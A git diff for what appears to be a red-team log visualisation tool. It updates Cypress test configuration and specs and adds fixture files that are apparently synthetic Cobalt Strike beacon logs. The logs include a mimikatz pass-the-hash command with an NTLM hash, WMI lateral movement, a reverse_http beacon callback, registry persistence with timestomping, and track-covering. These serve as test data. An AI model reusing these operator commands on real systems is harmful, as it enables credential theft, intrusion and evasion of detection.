diff --git a/applications/redeye-e2e/cypress.config.js b/applications/redeye-e2e/cypress.config.js
index 13088306..48b3c2b9 100644
--- a/applications/redeye-e2e/cypress.config.js
+++ b/applications/redeye-e2e/cypress.config.js
@@ -3,11 +3,10 @@ const { defineConfig } = require('cypress');
 module.exports = defineConfig({
 fixturesFolder: './src/fixtures',
 modifyObstructiveCode: false,
- video: false,
+ videoUploadOnPasses: false,
 videosFolder: '../../dist/applications/redeye-e2e/videos',
 screenshotsFolder: '../../dist/applications/redeye-e2e/screenshots',
 failOnStatusCode: false,
- experimentalWebKitSupport: true,
 viewportWidth: 1920,
 viewportHeight: 1080,
 reporter: '../../node_modules/cypress-multi-reporters',
@@ -19,7 +18,6 @@ module.exports = defineConfig({
 },
 e2e: {
 setupNodeEvents(on, config) {},
- experimentalSessionAndOrigin: true,
 specPattern: '../../**/*.cy.js',
 supportFile: './src/support/index.js',
 excludeSpecPattern: '*.skip.js',
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log
new file mode 100644
index 00000000..96ceef69
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.108/beacon_518544818.log
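Review bot: Swapping `video: false` for `videoUploadOnPasses: false` does not keep recording off — `videoUploadOnPasses` only controls whether a passing spec's video is uploaded to Cypress Cloud, and with `video` no longer set the 12.x line falls back to its default of recording every spec (the default only flipped to off in Cypress 13). Every `cypress run` will therefore write a video of the full campaign UI, fixture log content included, under `../../dist/applications/redeye-e2e/videos`, which slows runs and leaves more artifacts behind in CI. If recording was not the intent, keep `video: false,` and drop the new key; if it was, make it explicit with `video: true, // recordings kept to debug CI failures` so the next reader does not have to know the version-specific default.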
@@ -0,0 +1,67 @@
+10/13 16:26:39 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 3812; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/13 16:28:23 UTC [input] rev2self
+10/13 16:28:23 UTC [task] Tasked beacon to revert token
+10/13 16:28:23 UTC [input] pth EXAMPLE\PRESTON_SMITH 5dd210785947abcb14a0d855fa90a5e1
+10/13 16:28:23 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:PRESTON_SMITH /domain:EXAMPLE /ntlm:5dd210785947abcb14a0d855fa90a5e1 /run:"%COMSPEC% /c echo 71394c3e62c > \\.\pipe\13c777" command
+10/13 16:28:23 UTC [input] jump lateral 192.168.3.71 demo
+10/13 16:28:23 UTC [task] Tasked Beacon to jump to 192.168.3.71 (windows/beacon_http/reverse_http (10.20.19.157:80)) via wmi shenanigans
+10/13 16:28:25 UTC [task] Tasked beacon to run .NET program: lateral.exe -w 192.168.3.71
+10/13 16:28:31 UTC [checkin] host called home, sent: 851649 bytes
+10/13 16:28:32 UTC [output]
+Impersonated EXAMPLE\allison_powell
+
+10/13 16:28:32 UTC [output]
+received output:
+user : PRESTON_SMITH
+domain : EXAMPLE
+program : C:\Windows\system32\cmd.exe /c echo 71394c3e62c > \\.\pipe\13c777
+impers. : no
+NTLM : 5dd210785947abcb14a0d855fa90a5e1
+ | PID 2936
+ | TID 3708
+ | LSA Process is now R/W
+ | LUID 0 ; 51448631 (00000000:03110b37)
+ \_ msv1_0 - data copy @ 000001693C6D5F70 : OK !
+ \_ kerberos - data copy @ 000001693CE45E68
+ \_ aes256_hmac -> null
+ \_ aes128_hmac -> null
+ \_ rc4_hmac_nt OK
+ \_ rc4_hmac_old OK
+ \_ rc4_md4 OK
+ \_ rc4_hmac_nt_exp OK
+ \_ rc4_hmac_old_exp OK
+ \_ *Password replace @ 000001693CE556C8 (32) -> null
+
+
+10/13 16:28:32 UTC [output]
+received output:
+
+Starting lateral movement using wmi to 192.168.3.71
+Writing \\192.168.3.71\C$\Windows\winproc.exe
+
+
+10/13 16:29:32 UTC [output]
+received output:
+Creating event filter
+Creating event consumer
+Binding filter and consumer
+
+Waiting for trigger
+
+
+
+10/13 16:30:32 UTC [output]
+received output:
+
+Event Filters:
+Removed filter
+
+Event Consumers:
+Removed filter
+
+Bindings:
+Removed binding
+Covering tracks
+Deleted \\192.168.3.71\C$\Windows\winproc.exe
+
+
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log
new file mode 100644
index 00000000..5093714c
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/172.20.3.71/beacon_371268642.log
@@ -0,0 +1 @@
+10/13 16:29:29 UTC [metadata] 192.168.3.71 <- 192.168.3.71; computer: COMPUTER004; user: SYSTEM *; process: winproc02.exe; pid: 5412; os: Windows; version: 10.0; build: 14393; beacon arch: x64 (x64)
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log
new file mode 100644
index 00000000..02e3cd91
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/011/201013/events.log
@@ -0,0 +1,3 @@
+10/13 16:26:18 UTC *** analyst01 joined
+10/13 16:26:31 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
+10/13 16:29:24 UTC *** initial beacon from SYSTEM *@192.168.3.71 (COMPUTER004)
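Review bot: The fixture directory is named `172.20.3.108`, but every `[metadata]` line inside it reports the beacon host as `192.168.3.108` (and the `172.20.3.71` directory likewise holds a `192.168.3.71` beacon), so the two address sources in this dataset disagree. Cobalt Strike names the per-host log directory after the host's address, so if the parser keys hosts on the directory name the campaign will display an address that appears nowhere in the log text, and any spec asserting on host addresses will depend on which source wins. If the mismatch is deliberate, to exercise exactly that precedence, a one-line `README` in `smalldata/` or a comment in the consuming spec should say so; otherwise rename the directories to match the metadata.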
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log
new file mode 100644
index 00000000..1ef9301e
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/172.20.3.108/beacon_209150344.log
@@ -0,0 +1,12 @@
+10/23 18:51:22 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 5788; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/23 18:52:13 UTC [input] execute-assembly /home/analyst01/payloads/Persistance.exe -c
+10/23 18:52:13 UTC [task] Tasked beacon to run .NET program: Persistance.exe -c
+10/23 18:53:13 UTC [checkin] host called home, sent: 125507 bytes
+10/23 18:53:14 UTC [output]
+received output:
+
+Registry HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Values:
+
+Persistance not found
+
+
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log
new file mode 100644
index 00000000..5b26db70
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/012/201023/events.log
@@ -0,0 +1,2 @@
+10/23 18:50:45 UTC *** analyst01 joined
+10/23 18:51:13 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log
new file mode 100644
index 00000000..db26cd4d
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/172.20.3.108/beacon_209150344.log
@@ -0,0 +1,13 @@
+10/23 19:09:32 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 5788; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/23 19:10:43 UTC [input] jump user_persist COMPUTER001 demo
+10/23 19:10:43 UTC [task] Tasked Beacon to jump to COMPUTER001 (windows/beacon_http/reverse_http (10.20.19.157:80)) via registry persistance
+10/23 19:10:44 UTC [task] Tasked beacon to run .NET program: persist.exe -a
+10/23 19:11:29 UTC [checkin] host called home, sent: 411201 bytes
+10/23 19:11:29 UTC [output]
+received output:
+Writing C:\Windows\Tasks\systemupdate.exe
+Setting file timestamp to 2/6/2013 7:27:27 PM
+Adding registry value name: SystemUpdateServices
+Adding registry value data: C:\Windows\Tasks\systemupdate.exe
+
+
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log
new file mode 100644
index 00000000..d00cdf72
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/013/201023/events.log
@@ -0,0 +1,2 @@
+10/23 19:09:28 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
+10/23 19:09:30 UTC *** analyst01 joined
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log
new file mode 100644
index 00000000..fb38c9b0
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.108/beacon_518544818.log
@@ -0,0 +1,73 @@
+10/13 16:26:39 UTC [metadata] 192.168.3.108 <- 192.168.3.108; computer: COMPUTER001; user: allison_powell *; process: update.exe; pid: 3812; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
+10/13 16:28:23 UTC [input] rev2self
+10/13 16:28:23 UTC [task] Tasked beacon to revert token
+10/13 16:28:23 UTC [input] pth EXAMPLE\PRESTON_SMITH 5dd210785947abcb14a0d855fa90a5e1
+10/13 16:28:23 UTC [task] Tasked beacon to run mimikatz's sekurlsa::pth /user:PRESTON_SMITH /domain:EXAMPLE /ntlm:5dd210785947abcb14a0d855fa90a5e1 /run:"%COMSPEC% /c echo 71394c3e62c > \\.\pipe\13c777" command
+10/13 16:28:23 UTC [input] jump lateral 192.168.3.71 demo
+10/13 16:28:23 UTC [task] Tasked Beacon to jump to 192.168.3.71 (windows/beacon_http/reverse_http (10.20.19.157:80)) via wmi shenanigans
+10/13 16:28:25 UTC [task] Tasked beacon to run .NET program: lateral.exe -w 192.168.3.71
+10/13 16:28:31 UTC [checkin] host called home, sent: 851649 bytes
+10/13 16:28:32 UTC [output]
+Impersonated EXAMPLE\allison_powell
+
+10/13 16:28:32 UTC [output]
+received output:
+user : PRESTON_SMITH
+domain : EXAMPLE
+program : C:\Windows\system32\cmd.exe /c echo 71394c3e62c > \\.\pipe\13c777
+impers. : no
+NTLM : 5dd210785947abcb14a0d855fa90a5e1
+ | PID 2936
+ | TID 3708
+ | LSA Process is now R/W
+ | LUID 0 ; 51448631 (00000000:03110b37)
+ \_ msv1_0 - data copy @ 000001693C6D5F70 : OK !
+ \_ kerberos - data copy @ 000001693CE45E68
+ \_ aes256_hmac -> null
+ \_ aes128_hmac -> null
+ \_ rc4_hmac_nt OK
+ \_ rc4_hmac_old OK
+ \_ rc4_md4 OK
+ \_ rc4_hmac_nt_exp OK
+ \_ rc4_hmac_old_exp OK
+ \_ *Password replace @ 000001693CE556C8 (32) -> null
+
+
+10/13 16:28:32 UTC [output]
+received output:
+
+Starting lateral movement using wmi to 192.168.3.71
+Writing \\192.168.3.71\C$\Windows\winproc.exe
+
+
+10/13 16:29:32 UTC [output]
+received output:
+Creating event filter
+Creating event consumer
+Binding filter and consumer
+
+Waiting for trigger
+
+
+
+10/13 16:30:32 UTC [output]
+received output:
+
+Event Filters:
+Removed filter
+
+Event Consumers:
+Removed filter
+
+Bindings:
+Removed binding
+Covering tracks
+Deleted \\192.168.3.71\C$\Windows\winproc.exe
+
+
+10/13 17:39:31 UTC [input] exit
+10/13 17:39:31 UTC [task] <> Tasked beacon to exit
+10/13 17:39:34 UTC [checkin] host called home, sent: 8 bytes
+10/13 17:39:34 UTC [output]
+beacon exit.
+
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log
new file mode 100644
index 00000000..a1d4a5f7
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/172.20.3.71/beacon_371268642.log
@@ -0,0 +1,7 @@
+10/13 16:29:29 UTC [metadata] 192.168.3.71 <- 192.168.3.71; computer: COMPUTER004; user: SYSTEM *; process: winproc02.exe; pid: 5412; os: Windows; version: 10.0; build: 14393; beacon arch: x64 (x64)
+10/13 17:39:27 UTC [input] exit
+10/13 17:39:27 UTC [task] <> Tasked beacon to exit
+10/13 17:40:25 UTC [checkin] host called home, sent: 8 bytes
+10/13 17:40:25 UTC [output]
+beacon exit.
+
diff --git a/applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log
new file mode 100644
index 00000000..a3646e78
--- /dev/null
+++ b/applications/redeye-e2e/src/fixtures/smalldata/014/201013/events.log
@@ -0,0 +1,4 @@
+10/13 16:26:18 UTC *** analyst01 joined
+10/13 16:26:31 UTC *** initial beacon from allison_powell *@192.168.3.108 (COMPUTER001)
+10/13 16:29:24 UTC *** initial beacon from SYSTEM *@192.168.3.71 (COMPUTER004)
+10/13 17:40:41 UTC *** analyst01 quit
diff --git a/applications/redeye-e2e/src/integration/e2e/beacon-count.skip.js b/applications/redeye-e2e/src/integration/e2e/redteam/beacon-count.skip.js
similarity index 100%
rename from applications/redeye-e2e/src/integration/e2e/beacon-count.skip.js
rename to applications/redeye-e2e/src/integration/e2e/redteam/beacon-count.skip.js
diff --git a/applications/redeye-e2e/src/integration/e2e/command-count.cy.js b/applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js
similarity index 98%
rename from applications/redeye-e2e/src/integration/e2e/command-count.cy.js
rename to applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js
index 770b14a3..83321d2a 100644
--- a/applications/redeye-e2e/src/integration/e2e/command-count.cy.js
+++ b/applications/redeye-e2e/src/integration/e2e/redteam/command-count.cy.js
@@ -1,6 +1,6 @@
 ///
-import { graphqlRequest } from '../../support/utils';
+import { graphqlRequest } from '../../../support/utils.js';
 describe('Command counts', () => {
 const camp = 'commandcounts';
diff --git a/applications/redeye-e2e/src/integration/e2e/search-result-count.cy.js b/applications/redeye-e2e/src/integration/e2e/redteam/search-result-count.cy.js
similarity index 100%
rename from applications/redeye-e2e/src/integration/e2e/search-result-count.cy.js
rename to applications/redeye-e2e/src/integration/e2e/redteam/search-result-count.cy.js
diff --git a/applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js b/applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js
new file mode 100644
index 00000000..44062c18
--- /dev/null
+++ b/applications/redeye-e2e/src/integration/e2e/redteam/uploadRawLogs.cy.js
@@ -0,0 +1,25 @@
+///
+
+describe('Timeline tests', () => {
+ const camp = '200817';
+
+ it('Verify timeline features', () => {
+ cy.get('[cy-test=add-campaign-btn]').click();
+
+ cy.uploadLogs('seb', camp);
+
+ cy.wait(500);
+
+ cy.get('[cy-test=close-log]').click();
+
+ cy.reload();
+
+ cy.get('[cy-test=beacon-count]').invoke('text').should('contain', '4');
+
+ cy.get('[cy-test=command-count]').invoke('text').should('contain', '7');
+ });
+
+ after(() => {
+ cy.deleteCampaignGraphQL(camp);
+ });
+});
diff --git a/applications/redeye-e2e/src/support/graphqlCommands.js b/applications/redeye-e2e/src/support/graphqlCommands.js
index 0bf620e9..7adf03b2 100644
--- a/applications/redeye-e2e/src/support/graphqlCommands.js
+++ b/applications/redeye-e2e/src/support/graphqlCommands.js
@@ -22,7 +22,7 @@ Cypress.Commands.add('uploadLogs', (creatorName, folderName) => {
 name
 }
 }`;
- const variables1 = `{"campaignId": "${camp}", "name": "200817", "path": "/Users/angd742/Projects/redeye/applications/redeye-e2e/src/fixtures/TestDataSet/200817"}`;
+ const variables1 = `{"campaignId": "${camp}", "name": "200817", "path": "applications/redeye-e2e/src/fixtures/smalldata"}`;
 mutRequest(mutation2, variables1).then((res) => {
 cy.log(res);
 });
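Review bot: `cy.wait(500)` after `cy.uploadLogs('seb', camp)` is a fixed sleep standing in for the server finishing its parse, so the `'4'`/`'7'` count assertions race the parser and will flake on a slow CI box; because `cy.reload()` follows the sleep, a count that is still empty when the page loads may never retry into the right value if the page does not re-query on its own. Replace the sleep with a wait on observable state: a small custom command that polls the campaign's `parsingStatus` over GraphQL until it reports complete, then reload and assert on the counts. The title `describe('Timeline tests', …)` describes neither the file name nor what the spec checks (raw log upload and beacon/command counts); `describe('Upload raw logs', …)` would read correctly in reports. Cleanup in `after()` may not run when a run is aborted mid-test, so also deleting any stale `200817` campaign in a `before()` keeps reruns from tripping over leftovers.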
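Review bot: The new `variables1` still hard-codes `"name": "200817"` and now also hard-codes the folder, so `uploadLogs(creatorName, folderName)` ignores its `folderName` argument entirely; the caller in `uploadRawLogs.cy.js` passes `'200817'`, which only happens to equal the literal name and bears no relation to the `smalldata` directory actually uploaded, and its later `deleteCampaignGraphQL(camp)` rests on that coincidence. The request body is also assembled by string interpolation into JSON, so a name containing a quote yields an unparsable body. Derive both fields from the parameter and let `JSON.stringify` do the escaping: `const variables1 = JSON.stringify({ campaignId: camp, name: folderName, path: 'applications/redeye-e2e/src/fixtures/' + folderName });`, with the spec then passing `'smalldata'`. Note that the relative path is presumably resolved by the server against its own working directory, so it only works when the server is started from the repository root; `Cypress.Commands.add('uploadLogs', …)` opens above this hunk.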
@@ -35,95 +35,14 @@ Cypress.Commands.add('uploadLogs', (creatorName, folderName) => { graphqlRequest(query).then((res) => { cy.log(res); }); - // const mutation1 = ` - // mutation serversParse($campaignId: String!) { - // serversParse(campaignId: $campaignId) - // }`; + const mutation1 = ` + mutation serversParse($campaignId: String!) { + serversParse(campaignId: $campaignId) + }`; - // const variables = `{"campaignId": "${camp}"}`; - // mutRequest(mutation1, variables).then((res) => { - // cy.log(res); - // }); - // }); + const variables = `{"campaignId": "${camp}"}`; + mutRequest(mutation1, variables).then((res) => { + cy.log(res); + }); }); }); - -// Cypress.Commands.add('uploadCampaign1', (creatorName, folderName) => { -// let newId; - -// const mutation = ` -// mutation createCampaign($creatorName: String!, $name: String!) { -// createCampaign(creatorName: $creatorName, name: $name) { -// __typename -// id -// annotationCount -// beaconCount -// bloodStrikeServerCount -// commandCount -// computerCount -// firstLogTime -// lastLogTime -// name -// parsingStatus -// lastOpenedBy { - -// __typename -// id -// id - -// } -// creator { - -// __typename -// id -// id -// } - -// } -// }`; - -// cy -// .request({ -// url: 'http://localhost:4000/api/graphql', -// method: 'POST', -// failOnStatusCode: false, -// body: { query: mutation }, -// }) -// .then(() => { -// const query = `{ -// campaigns { -// id -// name -// } -// }`; -// cy.request({ -// url: 'http://localhost:4000/api/graphql', -// method: 'POST', -// failOnStatusCode: false, -// body: { query }, -// }); -// }) -// .then((response) => { -// let body = response.body.data.campaigns; -// cy.log(body); -// const last = [...body].pop(); -// newId = last['id']; -// cy.log(newId); -// }) -// .then(() => { -// const mutation2 = ` -// mutation { -// addLocalServerFolder(campaignId: ${newId}, fixture: "TestDataSet/${folderName}") -// }`; -// cy -// .request({ -// url: 'http://localhost:4000/api/graphql', -// 
method: 'POST',
-// failOnStatusCode: false,
-// body: { query: mutation2 },
-// })
-// .then((res) => {
-// cy.log(res);
-// });
-// });
-// cy.reload();
diff --git a/package.json b/package.json
index cd3d0bef..60161aa4 100644
--- a/package.json
+++ b/package.json
@@ -156,7 +156,7 @@
 "barrelsby": "^2.3.0",
 "builder-util": "^23.0.2",
 "cross-env": "^7.0.3",
- "cypress": "^11.2.0",
+ "cypress": "^12.3.0",
 "cypress-multi-reporters": "^1.6.1",
 "dotenv": "^8.2.0",
 "eslint": "^8.22.0",
@@ -193,7 +193,6 @@
 "nx": "^14.6.3",
 "pkg": "^5.8.0",
 "pkg-fetch": "^3.4.2",
- "playwright-webkit": "^1.25.2",
 "prettier": "^2.2.1",
 "rollup-plugin-auto-external": "^2.0.0",
 "save-svg-as-png": "^1.4.17",
diff --git a/yarn.lock b/yarn.lock
index 42170de1..3bbcb2bf 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -8325,9 +8325,9 @@ __metadata: languageName: node linkType: hard -"cypress@npm:^11.2.0": - version: 11.2.0 - resolution: "cypress@npm:11.2.0" +"cypress@npm:^12.3.0": + version: 12.3.0 + resolution: "cypress@npm:12.3.0" dependencies: "@cypress/request": ^2.88.10 "@cypress/xvfb": ^1.2.4
@@ -8373,7 +8373,7 @@ __metadata: yauzl: ^2.10.0 bin: cypress: bin/cypress - checksum: e13649fb4b62a3c9dff7cc571f4e01dba009d8179b05c4f885c5ceb4ed76b78a7323fec491d992da35527708b54e596bfc9edb1d702f788317889f794d8c1e76 + checksum: 00658996bcca918254348eb42bc03079ccf2d583e5c9c04190267edcbc542d4a22835d7399711c99f7aa7334412104b23cc5a1aa7f02b8b541c12298bf3f63f0 languageName: node linkType: hard
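Review bot: The re-enabled `serversParse` call only does `cy.log(res)` with its response, so a parse that fails server-side goes unnoticed here and surfaces later as a wrong beacon count in the spec; GraphQL reports such failures as a 200 with an `errors` array, and `mutRequest` looks like a `cy.request` wrapper judging by the commented-out code this hunk deletes. Assert on the result instead of logging it, e.g. `mutRequest(mutation1, variables).then((res) => { expect(res.body.errors, 'serversParse').to.be.undefined; });`, adjusting the property path to whatever `mutRequest` actually resolves. If the mutation returns before parsing completes (the consuming spec's `cy.wait(500)` suggests it does), a comment above the call such as `// kicks off parsing; completion must be polled via the campaign's parsingStatus` would spare the next spec author the same guess. `Cypress.Commands.add('uploadLogs', …)` starts above this hunk.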
@@ -15739,26 +15739,6 @@ __metadata: languageName: node linkType: hard -"playwright-core@npm:1.25.2": - version: 1.25.2 - resolution: "playwright-core@npm:1.25.2" - bin: - playwright: cli.js - checksum: 24ada61e2132bd7278cf0aa0ef711280e1519c437efa0088a99c47ef994202f4c9880521d8c0c51ab854bef08806f372477d754aac1e790ea64f18cd346b5b2f - languageName: node - linkType: hard - -"playwright-webkit@npm:^1.25.2": - version: 1.25.2 - resolution: "playwright-webkit@npm:1.25.2" - dependencies: - playwright-core: 1.25.2 - bin: - playwright: cli.js - checksum: 0aaf537021e75aed2bc339c2a8a1eb7632885c2da99d21ef8171f4b76454b1ba1b44959c0656d4fa6d5dd79b7532269712a7764528af8d01bcca50747ad10ef6 - languageName: node - linkType: hard - "please-upgrade-node@npm:^3.2.0": version: 3.2.0 resolution: "please-upgrade-node@npm:3.2.0" @@ -17068,7 +17048,7 @@ __metadata: cors: ^2.8.5 cross-env: ^7.0.3 crypto-js: ^4.0.0 - cypress: ^11.2.0 + cypress: ^12.3.0 cypress-multi-reporters: ^1.6.1 d3: ^6.7.0 dotenv: ^8.2.0 @@ -17126,7 +17106,6 @@ __metadata: path-to-regexp: ^6.2.0 pkg: ^5.8.0 pkg-fetch: ^3.4.2 - playwright-webkit: ^1.25.2 prettier: ^2.2.1 react: ^18.2.0 react-dom: ^18.2.0